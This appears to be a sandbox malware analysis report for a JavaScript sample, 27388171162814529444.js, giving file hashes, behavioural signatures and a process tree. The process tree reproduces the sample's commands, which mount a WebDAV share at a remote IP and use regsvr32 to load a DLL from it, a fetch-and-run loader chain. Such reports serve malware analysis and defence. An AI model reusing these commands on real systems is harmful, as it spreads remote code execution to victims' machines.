Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
09/07/2024, 12:04
General
-
Target
27388171162814529444.js
-
Size
5KB
-
MD5
f930c197abfe4b50fbd4abc181a06be3
-
SHA1
10c59ad6c7d00e6ab8c13f07434ccbdd625b736a
-
SHA256
3905939203105e8b4be245715f8aab7974158a1ca6db9cb748fa74e43b98b528
-
SHA512
53d4ed4f0059f071c2042df90cd15491564d672b0fe51c93e45dc95261f4fd350a60f21a9a181a4ef2607b72b0d155271e82792776c2a34a7ada7a70f76ee16e
-
SSDEEP
96:Cxa3Ul3UTYvh+B2YyKmpuQvRQ/zBFG3kfU42XleGo84ug4ylJcE3SIS614OZxAUK:TITyxtOoI0tpWxfA6vSx6Cgpt3ptLxtJ
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\27388171162814529444.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\27388171162814529444.js" "C:\Users\Admin\\cffzro.bat" && "C:\Users\Admin\\cffzro.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\142.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5f930c197abfe4b50fbd4abc181a06be3
SHA110c59ad6c7d00e6ab8c13f07434ccbdd625b736a
SHA2563905939203105e8b4be245715f8aab7974158a1ca6db9cb748fa74e43b98b528
SHA51253d4ed4f0059f071c2042df90cd15491564d672b0fe51c93e45dc95261f4fd350a60f21a9a181a4ef2607b72b0d155271e82792776c2a34a7ada7a70f76ee16e